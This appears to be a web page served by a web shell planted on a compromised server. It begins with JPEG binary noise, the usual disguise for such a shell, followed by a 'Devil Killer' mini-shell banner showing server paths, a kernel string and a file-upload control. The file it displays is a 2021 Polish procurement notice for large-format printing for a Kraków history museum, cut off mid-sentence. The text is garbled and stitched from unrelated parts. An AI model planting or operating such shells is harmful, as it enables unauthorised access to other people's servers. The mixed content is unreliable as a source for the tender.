JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210816/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20210816/0014981101-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Sukcesywne usługi poligraficzne na wydruki wielkoformatowe dla potrzeb działań wystawienniczych Muzeum Historycznego Miasta Krakowa wraz z dostawą, w okresie wrzesień-grudzień 2021. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Muzeum Historyczne Miasta Krakowa</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 382698540</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek Główny 35</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">31-011</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@muzeumkrakowa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.muzeumkrakowa.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sukcesywne usługi poligraficzne na wydruki wielkoformatowe dla potrzeb działań wystawienniczych Muzeum Historycznego Miasta Krakowa wraz z dostawą, w okresie wrzesień-grudzień 2021. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d50e09a7-fe5e-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00149811</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00005442/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Wydruki wielkoformatowe na potrzeby wystaw i wydarzeń</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.bip.krakow.pl/?dok_id=138367 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W<br/>niniejszym postępowaniu komunikacja Zamawiającego z Wykonawcami odbywa się elektronicznie przy<br/>użyciu ePUAP za pośrednictwem formularzy udostępnionych przez miniPortal<br/>https://miniportal.uzp.gov.pl/ w zakładce „dla Wykonawców”, „Formularz do komunikacji” a także za<br/>pomocą poczty elektronicznej (e-mail): przetargi@muzeumkrakowa.pl. Korespondencja przesłana za<br/>pomocą „Formularza do komunikacji” nie może być zaszyfrowana.<br/>2. Zamawiający zaleca składanie wszelkich dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń za pomocą poczty elektronicznej na adres e-mail:<br/>przetargi@muzeumkrakowa.pl, za wyjątkiem oferty, która musi zostać przekazana Zamawiającemu w<br/>sposób określony w niniejszym rozdziale SWZ, tj. za pośrednictwem miniPortalu, w którym po wyborze<br/>„Formularza do złożenia, zmiany, wycofania oferty lub wniosku” nastąpi przekierowanie na konto<br/>ePUAP. Szyfrowanie oferty przez Wykonawcę odbywa się za pomocą aplikacji dostępnej dla<br/>wykonawców na miniPortalu.<br/>3. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy<br/>posługują się numerem ogłoszenia (BZP lub ID postępowania z miniPortalu).<br/>4. Identyfikator postępowania oraz inne dane konieczne do poprawnego złożenia oferty, w tym także<br/>narzędzie do szyfrowania plików, znajdują się na miniPortalu https://miniportal.uzp.gov.pl/ w zakładce<br/>„dla Wykonawców”, „Lista wszystkich postępowań”, w szczegółach niniejszego postępowania.<br/>Składając ofertę Wykonawca zobowiązany jest podać właściwe dane postępowania – w przypadku<br/>podania niewłaściwych danych odpowiedzialność za nieprawidłowe złożenie oferty albo niezłożenie<br/>oferty ponosi Wykonawca.<br/>5. Korespondencję uważa się za przekazaną w terminie, jeżeli dotrze do Zamawiającego przed<br/>upływem wymaganego terminu. Każda ze stron na żądanie drugiej niezwłocznie potwierdzi faktotrzymania wiadomości elektronicznej.<br/>W przypadku braku potwierdzenia otrzymania wiadomości przez Wykonawcę, Zamawiający<br/>domniema, iż pismo wysłane przez Zamawiającego zostało mu doręczone w sposób umożliwiający<br/>zapoznanie się Wykonawcy z treścią pisma.<br/>7. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących<br/>formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do<br/>komunikacji” do których przekierowuje go miniPortal. Uwaga! Ofertę należy złożyć za pośrednictwem<br/>„Formularza do złożenia zmiany, wycofania oferty lub wniosku” dostępnego na miniPortalu, który<br/>następnie przekieruje automatycznie na ePUAP.<br/>Zaleca się aby pliki stanowiące ofertę skompresować do jednego pliku archiwum (ZIP).<br/>8. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z<br/>elektronicznej platformy usług administracji publicznej (ePUAP).<br/>9. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz<br/>złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.<br/>10. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich<br/>przekazania na ePUAP.<br/>11. Oferta składana jest pod rygorem nieważności w formie elektronicznej (podpisana kwalifikowanym<br/>podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem<br/>osobistym.<br/>Pozostałe informacje w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">: Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, Zamawiający informuję, że: administratorem Pani/Pana danych<br/>osobowych jest Muzeum Historyczne Miasta Krakowa Adres siedziby: 31-011 Kraków, Rynek Główny<br/>35, Kontakt: tel./fax (12) 422-32-64; e-mail: dyrekcja@muzeumkrakowa.pl; strona internetowa:<br/>www.muzeumkrakowa.pl Administrator wyznaczył Inspektora Ochrony Danych w Muzeum<br/>Historycznym Miasta Kraków, z którym można się kontaktować poprzez e-mail:<br/>iod@muzeumkrakowa.pl oraz pisemnie na adres administratora. Pani/Pana dane osobowe<br/>przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego pn. Sukcesywne usługi poligraficzne na wydruki wielkoformatowe<br/>dla potrzeb działań wystawienniczych Muzeum Historycznego Miasta Krakowa wraz z dostawą, w<br/>okresie wrzesień-grudzień 2021. Znak postępowania: ZP-271-271-14/21. odbiorcami Pani/Pana<br/>danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień<br/>publicznych (t.j. Dz. U. 2019 r. poz. 2019 ze zm.), dalej „ustawa Pzp”; Pani/Pana dane osobowe będą<br/>przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres<br/>przechowywania obejmuje cały czas trwania umowy; obowiązek podania przez Panią / Pana danych<br/>osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w<br/>przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;<br/>konsekwencje niepodania określonych danych wynikają z ustawy Pzp; w odniesieniu do Pani/Pana<br/>Ogłoszenie nr 2021/BZP 00135331/01 z dnia 2021-08-03<br/>2021-08-03 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>RODO; posiada Pani/Pan:− prawo dostępu do danych osobowych Pani/Pana dotyczących (na<br/>podstawie art. 15 RODO). W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1–3<br/>rozporządzenia 2016/679, wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać od<br/>osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie<br/>żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego<br/>lub konkursu.− prawo do sprostowania Pani/Pana danych osobowych (na podstawie art. 16 RODO)*;−<br/>prawo żądania (na podstawie art. 18 RODO) od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO<br/>**Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza<br/>przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia<br/>publicznego lub konkursu; − prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych, ul. Stawki 2, 00-193 Warszawa, gdy uzna Pani/Pan, że przetwarzanie danych osobowych<br/>Pani/Pana dotyczących narusza przepisy RODO; nie przysługuje Pani/Panu:− w związku z art. 17 ust.<br/>3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;− prawo do przenoszenia danych<br/>osobowych, o którym mowa w art. 20 RODO;− na podstawie art. 21 RODO prawo sprzeciwu, wobec<br/>przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych<br/>osobowych jest art. 6 ust. 1 lit. c RODO. Pozostałe informacje w SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-271-19/21</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest sukcesywne świadczenie usług poligraficznych na wydruki<br/>wielkoformatowe dla potrzeb działań wystawienniczych Muzeum Historycznego Miasta Krakowa<br/>wraz z dostawą, w okresie wrzesień-grudzień 2021. Szczegółowe określenie przedmiotu<br/>zamówienia, wielkości oraz zakresu zamówienia zawiera załącznik 1.1 do SWZ (Opis<br/>przedmiotu zamówienia-Formularz cenowy). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79340000-9 - Usługi reklamowe i marketingowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastrzega sobie prawo zrealizowania Umowy do wartości niższej niż określona w<br/>paragrafie 3 ust. 2 Umowy, w zależności od faktycznych potrzeb Zamawiającego. Zamawiający<br/>zobowiązuje się do zlecenia wykonania Przedmiotu Umowy w zakresie co najmniej 70 %<br/>wartości Umowy. Wykonawcy nie przysługują roszczenia z tego tytułu. <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Cena (C) – waga 60% (60 punktów)<br/>Termin dostawy do 5 dni (T5) – waga 20% (20 punktów)<br/>Termin dostawy do 3 dni (T3) – waga 20% (20 punktów)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy do 5 dni (T5)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy do 3 dni (T3)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">2) Oświadczenie Wykonawcy w zakresie wynikającym z art. 108 ust. 1 pkt 5 ustawy Pzp, o braku<br/>przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie<br/>konkurencji i konsumentów (Dz. U. 2020 poz. 1076 i 1086), z innym Wykonawcą, który złożył odrębna<br/>ofertę, ofertę częściową albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z<br/>Ogłoszenie nr 2021/BZP 00135331/01 z dnia 2021-08-03<br/>2021-08-03 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>dokumentami lub informacjami potwierdzającymi przygotowanie ofert, oferty częściowej niezależnie od<br/>innego wykonawcy należącego do tej samej grupy kapitałowej.<br/>3) odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4, sporządzonych nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 5. Wykonawcy mogą wspólnie ubiegać się o udzielenie przedmiotowego zamówienia.<br/>6. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia, Wykonawcy wspólnie ubiegający się o zamówienie mogą polegać na<br/>zdolnościach tych Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są<br/>wymagane.<br/>7. W przypadku, o którym mowa w pkt 6, Wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi lub dostawy<br/>wykonają poszczególni Wykonawcy.<br/>17. W przypadku gdy podmiotowe środki dowodowe, przedmiotowe środki dowodowe, inne<br/>dokumenty, lub dokumenty potwierdzające umocowanie do reprezentowania odpowiednio<br/>Wykonawcy, Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego,<br/>podmiotu udostępniającego zasoby lub Podwykonawcy niebędącego podmiotem<br/>udostępniającym zasoby, zwane dalej „dokumentami potwierdzającymi umocowanie do<br/>reprezentowania”, zostały wystawione przez upoważnione podmioty inne niż Wykonawca,<br/>Wykonawca wspólnie ubiegający się o udzielenie zamówienia, podmiot udostępniający zasoby<br/>lub Podwykonawca, zwane dalej „upoważnionymi podmiotami, jako dokument elektroniczny,<br/>przekazuje się ten dokument.<br/>18. W przypadku gdy dokumenty, o których mowa w ust. 17 zostały wystawione przez<br/>upoważnione podmioty jako dokument w postaci papierowej, przekazuje się cyfrowe<br/>odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem<br/>zaufanym lub podpisem osobistym, poświadczające zgodność cyfrowego odwzorowania z<br/>dokumentem w postaci papierowej.<br/>19. Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej, o<br/>którym mowa w pkt 18 dokonuje w przypadku:<br/>1) Podmiotowych środków dowodowych oraz dokumentów potwierdzających umocowanie do<br/>reprezentowania – odpowiednio Wykonawca, Wykonawca wspólnie ubiegający się o udzielenie<br/>zamówienia, podmiot udostępniający zasoby lub Podwykonawca, w zakresie podmiotowych<br/>środków dowodowych lub dokumentów potwierdzających umocowanie do reprezentowania,<br/>które każdego z nich dotyczą;<br/>2) Przedmiotowych środków dowodowych – odpowiednio Wykonawca lub Wykonawca wspólnie<br/>ubiegający się o udzielenie zamówienia;<br/>3) Innych dokumentów – odpowiednio Wykonawca lub Wykonawca wspólnie ubiegający się o<br/>udzielenie zamówienia, w zakresie dokumentów, które każdego z nich dotyczą;<br/>Ogłoszenie nr 2021/BZP 00135331/01 z dnia 2021-08-03<br/>2021-08-03 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>4) Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej<br/>może dokonać również notariusz.<br/>21. W przypadku gdy podmiotowe środki dowodowe, w tym oświadczenie, o którym mowa w art.<br/>117 ust. 4 ustawy Pzp oraz zobowiązanie podmiotu udostępniającego zasoby, przedmiotowe<br/>środki dowodowe, niewystawione przez upoważnione podmioty lub pełnomocnictwo, zostały<br/>sporządzone jako dokument w postaci papierowej i opatrzone własnoręcznym podpisem,<br/>przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem<br/>elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczającym 